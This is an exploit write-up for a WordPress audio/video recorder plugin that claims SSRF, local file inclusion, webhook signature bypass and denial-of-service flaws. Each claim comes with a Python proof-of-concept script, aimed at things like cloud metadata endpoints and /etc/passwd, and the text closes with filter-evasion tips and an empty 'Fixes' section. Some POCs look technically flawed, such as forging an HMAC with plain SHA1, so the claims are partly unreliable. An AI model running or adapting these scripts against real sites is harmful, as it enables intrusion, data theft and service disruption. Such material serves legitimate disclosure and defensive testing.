# Exploit Title: WordPress Pipe Audio Video and Screen Recorder 1.0.6 - Multiple Vulnerabilities
# Date: March 28, 2025
# Exploit Author: bRpsd cy[at]live.no
# Plugin Link: https://wordpress.org/plugins/pipe-audio-video-and-screen-recorder/
# Version: 1.0.6
# Tested on: MacOS local Xampp
Vulnerability1: SSRF in File Download
File:load/AddPipe.php
Function: addpipe_handle_download()
Vulnerable Code:
================================================================================================
public function addpipe_handle_download() {
// ...
$fileUrl = isset($_POST['file']) ? esc_url_raw(wp_unslash($_POST['file'])) : '';
$allowed_domains = ['addpipe.com'];
$parsed_url = wp_parse_url($fileUrl);
if (!isset($parsed_url['host']) || !in_array($parsed_url['host'], $allowed_domains, true)) {
wp_send_json_error(['message' => 'Unauthorized domain'], 403);
}
$fileContent = @file_get_contents($fileUrl); // SSRF here
// ...
}
================================================================================================
Vuln1 Python POC:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
import requests
target = "http://example.com/wp-admin/admin-ajax.php"
nonce = "VALID_NONCE_HERE" # Replace with actual nonce
# Craft malicious URL (redirects to internal service)
malicious_url = "https://addpipe.com/redirect?url=http://169.254.169.254/latest/meta-data"
data = {
"action": "addpipe_download_file",
"file": malicious_url,
"_wpnonce": nonce
}
response = requests.post(target, data=data)
print(f"SSRF Response ({response.status_code}):\n{response.text[:500]}")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Vulnerability2: LFI via Quality Parameter
File: load/AddPipe.php
Function: addpipe_ajax_shortcode_generator()
Vulnerable Code:
================================================================================================
public function addpipe_ajax_shortcode_generator() {
// ...
$quality = isset($_POST['quality']) ? sanitize_text_field(wp_unslash($_POST['quality'])) : '';
$qualityurl = "avq/" . $quality . ".xml"; // LFI here
$data = [
'qualityurl' => $qualityurl,
// ...
];
// ...
}
================================================================================================
Vuln2 Python POC:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
import requests
from urllib.parse import quote
target = "http://example.com/wp-admin/admin-ajax.php"
nonce = "VALID_NONCE_HERE" # Replace with actual nonce
# Directory traversal payload
lfi_payload = quote("../../../../etc/passwd")
data = {
"action": "addpipe_ajax_shortcode_generator",
"quality": lfi_payload,
"_wpnonce": nonce
}
response = requests.post(target, data=data)
print(f"LFI Response ({response.status_code}):\n{response.text}")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Vulnerability3: Webhook Signature Bypass
File: load/AddPipe.php
Function: addpipeWebhook()
Vulnerable Code:
================================================================================================
public function addpipeWebhook() {
$webhook_url = admin_url('admin-ajax.php?action=addpipeWebhook');
$received_signature = $_SERVER['HTTP_X_PIPE_SIGNATURE'] ?? '';
$json_payload = file_get_contents('php://input');
$data_to_sign = $webhook_url . $json_payload;
$expected_signature = base64_encode(hash_hmac('sha1', $data_to_sign, $this->pipeWebhookKey, true));
if (!hash_equals($expected_signature, $received_signature)) {
wp_die('Unauthorized request', 403);
}
// ...
}
================================================================================================
Vuln3 Python POC:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
import hashlib
import base64
import requests
webhook_url = "http://example.com/wp-admin/admin-ajax.php?action=addpipeWebhook"
known_key = "WEAK_SECRET_KEY" # Replace with guessed/exposed key
malicious_payload = {
"event": "video_recorded",
"data": {
"id": 666,
"envCode": "attacker_env",
"videoName": "hacked_recording"
}
}
# Generate forged signature
signature_data = webhook_url + str(malicious_payload)
signature = base64.b64encode(
hashlib.sha1(signature_data.encode()).hexdigest().encode()
).decode()
headers = {
"X-Pipe-Signature": signature,
"Content-Type": "application/json"
}
response = requests.post(webhook_url, json=malicious_payload, headers=headers)
print(f"Webhook Injection ({response.status_code}): {response.text}")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Vulnerability4: DoS via Sync Endpoint
File: load/AddPipe.php
Function: addpipe_ajax_sync_deleted()
Vulnerable Code:
================================================================================================
public function addpipe_ajax_sync_deleted() {
foreach ($this->addpipeGetRecordedRecordings() as $obj) {
if (!$this->addpipeIsFileOnServer($obj->recording_url)) {
$wpdb->query("UPDATE {$wpdb->prefix}addpipe_records SET active = 0...");
}
}
}
================================================================================================
Vuln4 POC:
import requests
from concurrent.futures import ThreadPoolExecutor
target = "http://example.com/wp-admin/admin-ajax.php"
nonce = "VALID_ADMIN_NONCE" # Requires admin privileges
def send_sync_request(_):
data = {"action": "addpipe_ajax_sync_deleted", "_wpnonce": nonce}
response = requests.post(target, data=data)
return response.status_code
# Launch 100 concurrent requests
with ThreadPoolExecutor(max_workers=20) as executor:
results = list(executor.map(send_sync_request, range(100)))
print(f"DoS Results: {set(results)}")
Defense Bypass: For LFI/SSRF:
Use double encoding (%252e%252e%252f)
Chain with open redirect vulnerabilities
Exploit parser inconsistencies (e.g., ///etc/passwd
Fixes: